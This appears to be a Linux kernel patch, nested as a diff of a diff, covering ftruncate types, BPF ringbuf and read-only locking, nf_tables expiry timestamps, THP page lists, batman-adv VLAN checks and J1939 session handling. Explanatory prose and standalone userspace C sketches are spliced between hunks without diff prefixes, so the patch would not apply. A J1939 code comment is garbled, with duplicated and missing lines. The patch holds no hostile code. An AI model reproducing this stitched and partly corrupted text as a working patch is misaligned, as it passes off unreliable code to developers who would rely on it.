+index dc4bce1649c1b..7a9cfd61145a0 100644
+--- a/fs/ocfs2/ocfs2_trace.h
++++ b/fs/ocfs2/ocfs2_trace.h
+@@ -2578,6 +2578,8 @@ DEFINE_OCFS2_ULL_UINT_EVENT(ocfs2_commit_cache_end);
+ 
+ DEFINE_OCFS2_INT_INT_EVENT(ocfs2_extend_trans);
+ 
++DEFINE_OCFS2_INT_EVENT(ocfs2_assure_trans_credits);
++
+ DEFINE_OCFS2_INT_EVENT(ocfs2_extend_trans_restart);
+ 
+ DEFINE_OCFS2_INT_INT_EVENT(ocfs2_allocate_extend_trans);
+diff --git a/fs/open.c b/fs/open.c
+index 51dc46620d033..0d63c94e1c5e6 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -199,13 +199,13 @@ long do_sys_ftruncate(unsigned int fd, loff_t length, int small)
+ 	return error;
+ }
+ 
+-SYSCALL_DEFINE2(ftruncate, unsigned int, fd, unsigned long, length)
++SYSCALL_DEFINE2(ftruncate, unsigned int, fd, off_t, length)
+ {
+ 	return do_sys_ftruncate(fd, length, 1);
+ }
+ 
+ #ifdef CONFIG_COMPAT
+-COMPAT_SYSCALL_DEFINE2(ftruncate, unsigned int, fd, compat_ulong_t, length)
++COMPAT_SYSCALL_DEFINE2(ftruncate, unsigned int, fd, compat_off_t, length)
+ {
+ 	return do_sys_ftruncate(fd, length, 1);
+ }
+diff --git a/include/linux/compat.h b/include/linux/compat.h
+index 594357881b0b3..77e84d17521eb 100644
+--- a/include/linux/compat.h
++++ b/include/linux/compat.h
+@@ -621,7 +621,7 @@ asmlinkage long compat_sys_fstatfs(unsigned int fd,
+ asmlinkage long compat_sys_fstatfs64(unsigned int fd, compat_size_t sz,
+ 				     struct compat_statfs64 __user *buf);
+ asmlinkage long compat_sys_truncate(const char __user *, compat_off_t);
+-asmlinkage long compat_sys_ftruncate(unsigned int, compat_ulong_t);
++asmlinkage long compat_sys_ftruncate(unsigned int, compat_off_t);
+ /* No generic prototype for truncate64, ftruncate64, fallocate */
+ asmlinkage long compat_sys_openat(int dfd, const char __user *filename,
+ 				  int flags, umode_t mode);
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index de6d6558a4d30..a849b533be5b1 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -709,18 +709,10 @@ static inline efi_status_t efi_query_variable_store(u32 attributes,
+ #endif
+ extern void __iomem *efi_lookup_mapped_addr(u64 phys_addr);
+ 
+-extern int __init efi_memmap_alloc(unsigned int num_entries,
+-				   struct efi_memory_map_data *data);
+-extern void __efi_memmap_free(u64 phys, unsigned long size,
+-			      unsigned long flags);
++extern int __init __efi_memmap_init(struct efi_memory_map_data *data);
+ extern int __init efi_memmap_init_early(struct efi_memory_map_data *data);
+ extern int __init efi_memmap_init_late(phys_addr_t addr, unsigned long size);
+ extern void __init efi_memmap_unmap(void);
+-extern int __init efi_memmap_install(struct efi_memory_map_data *data);
+-extern int __init efi_memmap_split_count(efi_memory_desc_t *md,
+-					 struct range *range);
+-extern void __init efi_memmap_insert(struct efi_memory_map *old_memmap,
+-				     void *buf, struct efi_mem_range *mem);
+ 
+ #ifdef CONFIG_EFI_ESRT
+ extern void __init efi_esrt_init(void);
+diff --git a/include/linux/filter.h b/include/linux/filter.h
+index face590b24e17..01f97956572ce 100644
+--- a/include/linux/filter.h
++++ b/include/linux/filter.h
+@@ -850,14 +850,15 @@ bpf_ctx_narrow_access_offset(u32 off, u32 size, u32 size_default)
+ 
+ #define bpf_classic_proglen(fprog) (fprog->len * sizeof(fprog->filter[0]))
+ 
+-static inline void bpf_prog_lock_ro(struct bpf_prog *fp)
++static inline int __must_check bpf_prog_lock_ro(struct bpf_prog *fp)
+ {
+ #ifndef CONFIG_BPF_JIT_ALWAYS_ON
+ 	if (!fp->jited) {
+ 		set_vm_flush_reset_perms(fp);
+-		set_memory_ro((unsigned long)fp, fp->pages);
++		return set_memory_ro((unsigned long)fp, fp->pages);
+ 	}
+ #endif
++	return 0;
+ }
+ 
+ static inline void bpf_jit_binary_lock_ro(struct bpf_binary_header *hdr)
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index dce105f67b4d8..160230bb1a9ce 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -4608,7 +4608,7 @@ static inline bool ieee80211_mle_size_ok(const u8 *data, u8 len)
+ 	bool check_common_len = false;
+ 	u16 control;
+ 
+-	if (len < fixed)
++	if (!data || len < fixed)
+ 		return false;
+ 
+ 	control = le16_to_cpu(mle->control);
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 3b9f4d7c40c38..93d2003091222 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -552,13 +552,12 @@ enum zone_watermarks {
+ };
+ 
+ /*
+- * One per migratetype for each PAGE_ALLOC_COSTLY_ORDER. One additional list
+- * for THP which will usually be GFP_MOVABLE. Even if it is another type,
+- * it should not contribute to serious fragmentation causing THP allocation
+- * failures.
++ * One per migratetype for each PAGE_ALLOC_COSTLY_ORDER. Two additional lists
++ * are added for THP. One PCP list is used by GFP_MOVABLE, and the other PCP list
++ * is used by GFP_UNMOVABLE and GFP_RECLAIMABLE.
+  */
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+-#define NR_PCP_THP 1
++#define NR_PCP_THP 2
+ #else
+ #define NR_PCP_THP 0
+ #endif
+diff --git a/include/linux/nvme.h b/include/linux/nvme.h
+index e6fb36b71b59d..15086715632e0 100644
+--- a/include/linux/nvme.h
++++ b/include/linux/nvme.h
+@@ -90,8 +90,8 @@ enum {
+ 	NVMF_RDMA_QPTYPE_DATAGRAM	= 2, /* Reliable Datagram */
+ };
+ 
+-/* RDMA QP Service Type codes for Discovery Log Page entry TSAS
+- * RDMA_QPTYPE field
++/* RDMA Provider Type codes for Discovery Log Page entry TSAS
++ * RDMA_PRTYPE field
+  */
+ enum {
+ 	NVMF_RDMA_PRTYPE_NOT_SPECIFIED	= 1, /* No Provider Specified */
+diff --git a/include/linux/syscalls.h b/include/linux/syscalls.h
+index 27a6ba1c0ec4e..dcce762b48fac 100644
+--- a/include/linux/syscalls.h
++++ b/include/linux/syscalls.h
+@@ -450,7 +450,7 @@ asmlinkage long sys_fstatfs(unsigned int fd, struct statfs __user *buf);
+ asmlinkage long sys_fstatfs64(unsigned int fd, size_t sz,
+ 				struct statfs64 __user *buf);
+ asmlinkage long sys_truncate(const char __user *path, long length);
+-asmlinkage long sys_ftruncate(unsigned int fd, unsigned long length);
++asmlinkage long sys_ftruncate(unsigned int fd, off_t length);
+ #if BITS_PER_LONG == 32
+ asmlinkage long sys_truncate64(const char __user *path, loff_t length);
+ asmlinkage long sys_ftruncate64(unsigned int fd, loff_t length);
+@@ -960,9 +960,15 @@ asmlinkage long sys_prlimit64(pid_t pid, unsigned int resource,
+ 				const struct rlimit64 __user *new_rlim,
+ 				struct rlimit64 __user *old_rlim);
+ asmlinkage long sys_fanotify_init(unsigned int flags, unsigned int event_f_flags);
++#if defined(CONFIG_ARCH_SPLIT_ARG64)
++asmlinkage long sys_fanotify_mark(int fanotify_fd, unsigned int flags,
++                                unsigned int mask_1, unsigned int mask_2,
++				int dfd, const char  __user * pathname);
++#else
+ asmlinkage long sys_fanotify_mark(int fanotify_fd, unsigned int flags,
+ 				  u64 mask, int fd,
+ 				  const char  __user *pathname);
++#endif
+ asmlinkage long sys_name_to_handle_at(int dfd, const char __user *name,
+ 				      struct file_handle __user *handle,
+ 				      int __user *mnt_id, int flag);
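
The CONFIG_ARCH_SPLIT_ARG64 prototype exists because 32-bit ABIs pass a 64-bit argument as two register-sized halves that the syscall wrapper must glue back together. A sketch of the reassembly, assuming the low word arrives first (the real order is ABI-dependent):

#include <stdint.h>
#include <stdio.h>

/* On 32-bit ABIs a 64-bit syscall argument arrives as two
 * register-sized halves; this sketch assumes a little-endian
 * split with the low word first. */
static uint64_t merge_mask(uint32_t mask_lo, uint32_t mask_hi)
{
	return ((uint64_t)mask_hi << 32) | mask_lo;
}

int main(void)
{
	uint64_t mask = merge_mask(0x00000001u, 0x00000002u);

	printf("mask = 0x%016llx\n", (unsigned long long)mask);
	return 0;
}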
+diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h
+index 8132f330306db..4242f863f5601 100644
+--- a/include/net/inet_connection_sock.h
++++ b/include/net/inet_connection_sock.h
+@@ -263,7 +263,7 @@ struct dst_entry *inet_csk_route_child_sock(const struct sock *sk,
+ struct sock *inet_csk_reqsk_queue_add(struct sock *sk,
+ 				      struct request_sock *req,
+ 				      struct sock *child);
+-void inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
++bool inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
+ 				   unsigned long timeout);
+ struct sock *inet_csk_complete_hashdance(struct sock *sk, struct sock *child,
+ 					 struct request_sock *req,
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 2fa344cb66f60..9a80d0251d8f3 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -582,6 +582,11 @@ static inline void *nft_set_priv(const struct nft_set *set)
+ 	return (void *)set->data;
+ }
+ 
++static inline enum nft_data_types nft_set_datatype(const struct nft_set *set)
++{
++	return set->dtype == NFT_DATA_VERDICT ? NFT_DATA_VERDICT : NFT_DATA_VALUE;
++}
++
+ static inline bool nft_set_gc_is_pending(const struct nft_set *s)
+ {
+ 	return refcount_read(&s->refs) != 1;
+@@ -784,10 +789,16 @@ static inline struct nft_set_elem_expr *nft_set_ext_expr(const struct nft_set_ex
+ 	return nft_set_ext(ext, NFT_SET_EXT_EXPRESSIONS);
+ }
+ 
+-static inline bool nft_set_elem_expired(const struct nft_set_ext *ext)
++static inline bool __nft_set_elem_expired(const struct nft_set_ext *ext,
++					  u64 tstamp)
+ {
+ 	return nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION) &&
+-	       time_is_before_eq_jiffies64(*nft_set_ext_expiration(ext));
++	       time_after_eq64(tstamp, *nft_set_ext_expiration(ext));
++}
++
++static inline bool nft_set_elem_expired(const struct nft_set_ext *ext)
++{
++	return __nft_set_elem_expired(ext, get_jiffies_64());
+ }
+ 
+ static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set,
+@@ -1711,6 +1722,7 @@ struct nftables_pernet {
+ 	struct list_head	notify_list;
+ 	struct mutex		commit_mutex;
+ 	u64			table_handle;
++	u64			tstamp;
+ 	unsigned int		base_seq;
+ 	u8			validate_state;
+ 	unsigned int		gc_seq;
+@@ -1723,6 +1735,11 @@ static inline struct nftables_pernet *nft_pernet(const struct net *net)
+ 	return net_generic(net, nf_tables_net_id);
+ }
+ 
++static inline u64 nft_net_tstamp(const struct net *net)
++{
++	return nft_pernet(net)->tstamp;
++}
++
+ #define __NFT_REDUCE_READONLY	1UL
+ #define NFT_REDUCE_READONLY	(void *)__NFT_REDUCE_READONLY
+ 
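
The per-transaction tstamp snapshot ensures every expiry check inside one commit compares against the same instant, so an element cannot flip from alive to expired halfway through the batch. A minimal sketch of the wraparound-safe comparison in the spirit of time_after_eq64():

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* 64-bit "a is after or equal to b", robust against wraparound,
 * modeled on the kernel's time_after_eq64(). */
static bool after_eq64(uint64_t a, uint64_t b)
{
	return (int64_t)(a - b) >= 0;
}

struct elem { uint64_t expiration; };

/* All expiry decisions inside one transaction compare against the
 * same snapshot taken at transaction start. */
static bool elem_expired(const struct elem *e, uint64_t tstamp)
{
	return after_eq64(tstamp, e->expiration);
}

int main(void)
{
	struct elem e = { .expiration = 1000 };
	uint64_t tstamp = 999;	/* snapshot taken at commit start */

	printf("expired: %d\n", elem_expired(&e, tstamp));	/* 0 */
	printf("expired: %d\n", elem_expired(&e, tstamp + 1));	/* 1 */
	return 0;
}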
+diff --git a/include/trace/events/qdisc.h b/include/trace/events/qdisc.h
+index 1f4258308b967..061fd49603035 100644
+--- a/include/trace/events/qdisc.h
++++ b/include/trace/events/qdisc.h
+@@ -81,14 +81,14 @@ TRACE_EVENT(qdisc_reset,
+ 	TP_ARGS(q),
+ 
+ 	TP_STRUCT__entry(
+-		__string(	dev,		qdisc_dev(q)->name	)
++		__string(	dev,		qdisc_dev(q) ? qdisc_dev(q)->name : "(null)"	)
+ 		__string(	kind,		q->ops->id		)
+ 		__field(	u32,		parent			)
+ 		__field(	u32,		handle			)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__assign_str(dev, qdisc_dev(q)->name);
++		__assign_str(dev, qdisc_dev(q) ? qdisc_dev(q)->name : "(null)");
+ 		__assign_str(kind, q->ops->id);
+ 		__entry->parent = q->parent;
+ 		__entry->handle = q->handle;
+diff --git a/include/uapi/asm-generic/unistd.h b/include/uapi/asm-generic/unistd.h
+index 45fa180cc56ad..28973a89cdc7f 100644
+--- a/include/uapi/asm-generic/unistd.h
++++ b/include/uapi/asm-generic/unistd.h
+@@ -805,7 +805,7 @@ __SC_COMP(__NR_pselect6_time64, sys_pselect6, compat_sys_pselect6_time64)
+ #define __NR_ppoll_time64 414
+ __SC_COMP(__NR_ppoll_time64, sys_ppoll, compat_sys_ppoll_time64)
+ #define __NR_io_pgetevents_time64 416
+-__SYSCALL(__NR_io_pgetevents_time64, sys_io_pgetevents)
++__SC_COMP(__NR_io_pgetevents_time64, sys_io_pgetevents, compat_sys_io_pgetevents_time64)
+ #define __NR_recvmmsg_time64 417
+ __SC_COMP(__NR_recvmmsg_time64, sys_recvmmsg, compat_sys_recvmmsg_time64)
+ #define __NR_mq_timedsend_time64 418
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 44abf88e1bb0d..0ea0d50a7c161 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -2034,6 +2034,7 @@ static unsigned int PROG_NAME(stack_size)(const void *ctx, const struct bpf_insn
+ 	u64 stack[stack_size / sizeof(u64)]; \
+ 	u64 regs[MAX_BPF_EXT_REG] = {}; \
+ \
++	kmsan_unpoison_memory(stack, sizeof(stack)); \
+ 	FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)]; \
+ 	ARG1 = (u64) (unsigned long) ctx; \
+ 	return ___bpf_prog_run(regs, insn); \
+@@ -2047,6 +2048,7 @@ static u64 PROG_NAME_ARGS(stack_size)(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5, \
+ 	u64 stack[stack_size / sizeof(u64)]; \
+ 	u64 regs[MAX_BPF_EXT_REG]; \
+ \
++	kmsan_unpoison_memory(stack, sizeof(stack)); \
+ 	FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)]; \
+ 	BPF_R1 = r1; \
+ 	BPF_R2 = r2; \
+@@ -2223,7 +2225,9 @@ struct bpf_prog *bpf_prog_select_runtime(struct bpf_prog *fp, int *err)
+ 	}
+ 
+ finalize:
+-	bpf_prog_lock_ro(fp);
++	*err = bpf_prog_lock_ro(fp);
++	if (*err)
++		return fp;
+ 
+ 	/* The tail call compatibility check can only be done at
+ 	 * this late stage as we need to determine, if we deal
+diff --git a/kernel/bpf/ringbuf.c b/kernel/bpf/ringbuf.c
+index 9e832acf46925..a1911391a864c 100644
+--- a/kernel/bpf/ringbuf.c
++++ b/kernel/bpf/ringbuf.c
+@@ -59,7 +59,8 @@ struct bpf_ringbuf {
+ 	 * This prevents a user-space application from modifying the
+ 	 * position and ruining in-kernel tracking. The permissions of the
+ 	 * pages depend on who is producing samples: user-space or the
+-	 * kernel.
++	 * kernel. Note that the pending counter is placed in the same
++	 * page as the producer, so that it shares the same cache line.
+ 	 *
+ 	 * Kernel-producer
+ 	 * ---------------
+@@ -78,6 +79,7 @@ struct bpf_ringbuf {
+ 	 */
+ 	unsigned long consumer_pos __aligned(PAGE_SIZE);
+ 	unsigned long producer_pos __aligned(PAGE_SIZE);
++	unsigned long pending_pos;
+ 	char data[] __aligned(PAGE_SIZE);
+ };
+ 
+@@ -176,6 +178,7 @@ static struct bpf_ringbuf *bpf_ringbuf_alloc(size_t data_sz, int numa_node)
+ 	rb->mask = data_sz - 1;
+ 	rb->consumer_pos = 0;
+ 	rb->producer_pos = 0;
++	rb->pending_pos = 0;
+ 
+ 	return rb;
+ }
+@@ -390,9 +393,9 @@ bpf_ringbuf_restore_from_rec(struct bpf_ringbuf_hdr *hdr)
+ 
+ static void *__bpf_ringbuf_reserve(struct bpf_ringbuf *rb, u64 size)
+ {
+-	unsigned long cons_pos, prod_pos, new_prod_pos, flags;
+-	u32 len, pg_off;
++	unsigned long cons_pos, prod_pos, new_prod_pos, pend_pos, flags;
+ 	struct bpf_ringbuf_hdr *hdr;
++	u32 len, pg_off, tmp_size, hdr_len;
+ 
+ 	if (unlikely(size > RINGBUF_MAX_RECORD_SZ))
+ 		return NULL;
+@@ -410,13 +413,29 @@ static void *__bpf_ringbuf_reserve(struct bpf_ringbuf *rb, u64 size)
+ 		spin_lock_irqsave(&rb->spinlock, flags);
+ 	}
+ 
++	pend_pos = rb->pending_pos;
+ 	prod_pos = rb->producer_pos;
+ 	new_prod_pos = prod_pos + len;
+ 
+-	/* check for out of ringbuf space by ensuring producer position
+-	 * doesn't advance more than (ringbuf_size - 1) ahead
++	while (pend_pos < prod_pos) {
++		hdr = (void *)rb->data + (pend_pos & rb->mask);
++		hdr_len = READ_ONCE(hdr->len);
++		if (hdr_len & BPF_RINGBUF_BUSY_BIT)
++			break;
++		tmp_size = hdr_len & ~BPF_RINGBUF_DISCARD_BIT;
++		tmp_size = round_up(tmp_size + BPF_RINGBUF_HDR_SZ, 8);
++		pend_pos += tmp_size;
++	}
++	rb->pending_pos = pend_pos;
++
++	/* check for out of ringbuf space:
++	 * - by ensuring producer position doesn't advance more than
++	 *   (ringbuf_size - 1) ahead
++	 * - by ensuring oldest not yet committed record until newest
++	 *   record does not span more than (ringbuf_size - 1)
+ 	 */
+-	if (new_prod_pos - cons_pos > rb->mask) {
++	if (new_prod_pos - cons_pos > rb->mask ||
++	    new_prod_pos - pend_pos > rb->mask) {
+ 		spin_unlock_irqrestore(&rb->spinlock, flags);
+ 		return NULL;
+ 	}
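
The new pending_pos tracks the oldest reservation that has not been committed yet, and reservations are refused once the span from it to the new producer position would exceed the data area. A userspace model of the position arithmetic; the positions grow monotonically, so only unsigned differences matter:

#include <stdio.h>

#define RB_SIZE		4096u	/* power of two */
#define RB_MASK		(RB_SIZE - 1)

/* Monotonically increasing byte positions; unsigned wraparound in
 * their differences is harmless. */
struct rb {
	unsigned long consumer_pos;
	unsigned long producer_pos;
	unsigned long pending_pos;	/* oldest uncommitted record */
};

static int can_reserve(const struct rb *rb, unsigned long len)
{
	unsigned long new_prod = rb->producer_pos + len;

	/* Reject if the data area would be overrun either by the
	 * consumer lagging behind or by uncommitted reservations. */
	if (new_prod - rb->consumer_pos > RB_MASK ||
	    new_prod - rb->pending_pos > RB_MASK)
		return 0;
	return 1;
}

int main(void)
{
	struct rb rb = {
		.consumer_pos = 8192,	/* fully consumed */
		.producer_pos = 8192,
		.pending_pos  = 4200,	/* one stuck reservation */
	};

	printf("reserve 512: %d\n", can_reserve(&rb, 512));	/* 0 */
	rb.pending_pos = rb.producer_pos;	/* now committed */
	printf("reserve 512: %d\n", can_reserve(&rb, 512));	/* 1 */
	return 0;
}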
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 1d851e2f48590..56a5c8beb553d 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -14113,10 +14113,14 @@ static int jit_subprogs(struct bpf_verifier_env *env)
+ 	 * bpf_prog_load will add the kallsyms for the main program.
+ 	 */
+ 	for (i = 1; i < env->subprog_cnt; i++) {
+-		bpf_prog_lock_ro(func[i]);
+-		bpf_prog_kallsyms_add(func[i]);
++		err = bpf_prog_lock_ro(func[i]);
++		if (err)
++			goto out_free;
+ 	}
+ 
++	for (i = 1; i < env->subprog_cnt; i++)
++		bpf_prog_kallsyms_add(func[i]);
++
+ 	/* Last step: make now unused interpreter insns from main
+ 	 * prog consistent for later dump requests, so they can
+ 	 * later look the same as if they were interpreted only.
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index e0e09b700b430..4044e4d80cbb0 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -2116,7 +2116,7 @@ EXPORT_SYMBOL_GPL(__cpuhp_state_add_instance);
+  * The caller needs to hold cpus read locked while calling this function.
+  * Return:
+  *   On success:
+- *      Positive state number if @state is CPUHP_AP_ONLINE_DYN;
++ *      Positive state number if @state is CPUHP_AP_ONLINE_DYN or CPUHP_BP_PREPARE_DYN;
+  *      0 for all other states
+  *   On failure: proper (negative) error code
+  */
+@@ -2139,7 +2139,7 @@ int __cpuhp_setup_state_cpuslocked(enum cpuhp_state state,
+ 	ret = cpuhp_store_callbacks(state, name, startup, teardown,
+ 				    multi_instance);
+ 
+-	dynstate = state == CPUHP_AP_ONLINE_DYN;
++	dynstate = state == CPUHP_AP_ONLINE_DYN || state == CPUHP_BP_PREPARE_DYN;
+ 	if (ret > 0 && dynstate) {
+ 		state = ret;
+ 		ret = 0;
+@@ -2170,8 +2170,8 @@ int __cpuhp_setup_state_cpuslocked(enum cpuhp_state state,
+ out:
+ 	mutex_unlock(&cpuhp_state_mutex);
+ 	/*
+-	 * If the requested state is CPUHP_AP_ONLINE_DYN, return the
+-	 * dynamically allocated state in case of success.
++	 * If the requested state is CPUHP_AP_ONLINE_DYN or CPUHP_BP_PREPARE_DYN,
++	 * return the dynamically allocated state in case of success.
+ 	 */
+ 	if (!ret && dynstate)
+ 		return state;
+diff --git a/kernel/sys_ni.c b/kernel/sys_ni.c
+index 860b2dcf3ac46..f4922c60a615b 100644
+--- a/kernel/sys_ni.c
++++ b/kernel/sys_ni.c
+@@ -46,8 +46,8 @@ COND_SYSCALL(io_getevents_time32);
+ COND_SYSCALL(io_getevents);
+ COND_SYSCALL(io_pgetevents_time32);
+ COND_SYSCALL(io_pgetevents);
+-COND_SYSCALL_COMPAT(io_pgetevents_time32);
+ COND_SYSCALL_COMPAT(io_pgetevents);
++COND_SYSCALL_COMPAT(io_pgetevents_time64);
+ COND_SYSCALL(io_uring_setup);
+ COND_SYSCALL(io_uring_enter);
+ COND_SYSCALL(io_uring_register);
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index a7537da43bd45..12412263d131e 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -705,12 +705,16 @@ static void bad_page(struct page *page, const char *reason)
+ 
+ static inline unsigned int order_to_pindex(int migratetype, int order)
+ {
++	bool __maybe_unused movable;
+ 	int base = order;
+ 
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ 	if (order > PAGE_ALLOC_COSTLY_ORDER) {
+ 		VM_BUG_ON(order != pageblock_order);
+-		return NR_LOWORDER_PCP_LISTS;
++
++		movable = migratetype == MIGRATE_MOVABLE;
++
++		return NR_LOWORDER_PCP_LISTS + movable;
+ 	}
+ #else
+ 	VM_BUG_ON(order > PAGE_ALLOC_COSTLY_ORDER);
+@@ -724,7 +728,7 @@ static inline int pindex_to_order(unsigned int pindex)
+ 	int order = pindex / MIGRATE_PCPTYPES;
+ 
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+-	if (pindex == NR_LOWORDER_PCP_LISTS)
++	if (pindex >= NR_LOWORDER_PCP_LISTS)
+ 		order = pageblock_order;
+ #else
+ 	VM_BUG_ON(order > PAGE_ALLOC_COSTLY_ORDER);
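
With NR_PCP_THP now 2, THP-order pages are split onto two dedicated PCP lists keyed by movability. A sketch of the index mapping; the migratetype values and the extra thp_order parameter are assumptions of this example, not the kernel signature:

#include <stdio.h>

/* Assumed values for illustration only. */
#define MIGRATE_UNMOVABLE	0
#define MIGRATE_MOVABLE		1
#define MIGRATE_RECLAIMABLE	2
#define MIGRATE_PCPTYPES	3
#define PAGE_ALLOC_COSTLY_ORDER	3
#define NR_LOWORDER_PCP_LISTS	(MIGRATE_PCPTYPES * (PAGE_ALLOC_COSTLY_ORDER + 1))

/* THP-sized pages get one of two dedicated lists: movable
 * allocations land on the second one, everything else on the
 * first, so unmovable THPs no longer mix with movable ones. */
static int order_to_pindex(int migratetype, int order, int thp_order)
{
	if (order == thp_order)
		return NR_LOWORDER_PCP_LISTS + (migratetype == MIGRATE_MOVABLE);
	return order * MIGRATE_PCPTYPES + migratetype;
}

int main(void)
{
	int thp_order = 9;	/* pageblock order on x86-64 */

	printf("movable THP   -> list %d\n",
	       order_to_pindex(MIGRATE_MOVABLE, thp_order, thp_order));
	printf("unmovable THP -> list %d\n",
	       order_to_pindex(MIGRATE_UNMOVABLE, thp_order, thp_order));
	return 0;
}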
+diff --git a/net/batman-adv/originator.c b/net/batman-adv/originator.c
+index dafef3a78ad5d..7388d2ad7b5d8 100644
+--- a/net/batman-adv/originator.c
++++ b/net/batman-adv/originator.c
+@@ -12,6 +12,7 @@
+ #include <linux/errno.h>
+ #include <linux/etherdevice.h>
+ #include <linux/gfp.h>
++#include <linux/if_vlan.h>
+ #include <linux/jiffies.h>
+ #include <linux/kref.h>
+ #include <linux/list.h>
+@@ -131,6 +132,29 @@ batadv_orig_node_vlan_get(struct batadv_orig_node *orig_node,
+ 	return vlan;
+ }
+ 
++/**
++ * batadv_vlan_id_valid() - check if vlan id is in valid batman-adv encoding
++ * @vid: the VLAN identifier
++ *
++ * Return: true when either no vlan is set or the VLAN is in the correct range,
++ *  false otherwise
++ */
++static bool batadv_vlan_id_valid(unsigned short vid)
++{
++	unsigned short non_vlan = vid & ~(BATADV_VLAN_HAS_TAG | VLAN_VID_MASK);
++
++	if (vid == 0)
++		return true;
++
++	if (!(vid & BATADV_VLAN_HAS_TAG))
++		return false;
++
++	if (non_vlan)
++		return false;
++
++	return true;
++}
++
+ /**
+  * batadv_orig_node_vlan_new() - search and possibly create an orig_node_vlan
+  *  object
+@@ -149,6 +173,9 @@ batadv_orig_node_vlan_new(struct batadv_orig_node *orig_node,
+ {
+ 	struct batadv_orig_node_vlan *vlan;
+ 
++	if (!batadv_vlan_id_valid(vid))
++		return NULL;
++
+ 	spin_lock_bh(&orig_node->vlan_list_lock);
+ 
+ 	/* first look if an object for this vid already exists */
+diff --git a/net/can/j1939/main.c b/net/can/j1939/main.c
+index a6fb89fa62785..7e8a20f2fc42b 100644
+--- a/net/can/j1939/main.c
++++ b/net/can/j1939/main.c
+@@ -30,10 +30,6 @@ MODULE_ALIAS("can-proto-" __stringify(CAN_J1939));
+ /* CAN_HDR: #bytes before can_frame data part */
+ #define J1939_CAN_HDR (offsetof(struct can_frame, data))
+ 
+-/* CAN_FTR: #bytes beyond data part */
+-#define J1939_CAN_FTR (sizeof(struct can_frame) - J1939_CAN_HDR - \
+-		 sizeof(((struct can_frame *)0)->data))
+-
+ /* lowest layer */
+ static void j1939_can_recv(struct sk_buff *iskb, void *data)
+ {
+@@ -342,7 +338,7 @@ int j1939_send_one(struct j1939_priv *priv, struct sk_buff *skb)
+ 	memset(cf, 0, J1939_CAN_HDR);
+ 
+ 	/* make it a full can frame again */
+-	skb_put(skb, J1939_CAN_FTR + (8 - dlc));
++	skb_put_zero(skb, 8 - dlc);
+ 
+ 	canid = CAN_EFF_FLAG |
+ 		(skcb->priority << 26) |
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index bd8ec24338324..25e7339834670 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1593,8 +1593,8 @@ j1939_session *j1939_xtp_rx_rts_session_new(struct j1939_priv *priv,
+ 	struct j1939_sk_buff_cb skcb = *j1939_skb_to_cb(skb);
+ 	struct j1939_session *session;
+ 	const u8 *dat;
++	int len, ret;
+ 	pgn_t pgn;
+-	int len;
+ 
+ 	netdev_dbg(priv->ndev, "%s\n", __func__);
+ 
+@@ -1653,7 +1653,22 @@ j1939_session *j1939_xtp_rx_rts_session_new(struct j1939_priv *priv,
+ 	session->tskey = priv->rx_tskey++;
+ 	j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_RTS);
+ 
+-	WARN_ON_ONCE(j1939_session_activate(session));
++	ret = j1939_session_activate(session);
++	if (ret) {
++		/* Entering this scope indicates an issue with the J1939 bus.
++		 * Possible scenarios include:
++		 * - A time lapse occurred, and a new session was initiated
++		 *   due to another packet being sent correctly. This could
++		 *   have been caused by too long interrupt, debugger, or being
++		 *   have been caused by an overly long interrupt, a debugger,
++		 *   or being scheduled out by another task.
++		 *   from a malfunctioning device or during a test scenario.
++		 */
++		netdev_alert(priv->ndev, "%s: 0x%p: concurrent session with same addr (%02x %02x) is already active.\n",
++			     __func__, session, skcb.addr.sa, skcb.addr.da);
++		j1939_session_put(session);
++		return NULL;
++	}
+ 
+ 	return session;
+ }
+@@ -1681,6 +1696,8 @@ static int j1939_xtp_rx_rts_session_active(struct j1939_session *session,
+ 
+ 		j1939_session_timers_cancel(session);
+ 		j1939_session_cancel(session, J1939_XTP_ABORT_BUSY);
++		if (session->transmission)
++			j1939_session_deactivate_activate_next(session);
+ 
+ 		return -EBUSY;
+ 	}
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 7a07413913538..dc89c34247187 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -82,6 +82,9 @@
+ #include <net/mptcp.h>
+ #include <net/netfilter/nf_conntrack_bpf.h>
+ 
++/* Keep the struct bpf_fib_lookup small so that it fits into a cacheline */
++static_assert(sizeof(struct bpf_fib_lookup) == 64, "struct bpf_fib_lookup size check");
++
+ static const struct bpf_func_proto *
+ bpf_sk_base_func_proto(enum bpf_func_id func_id);
+ 
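
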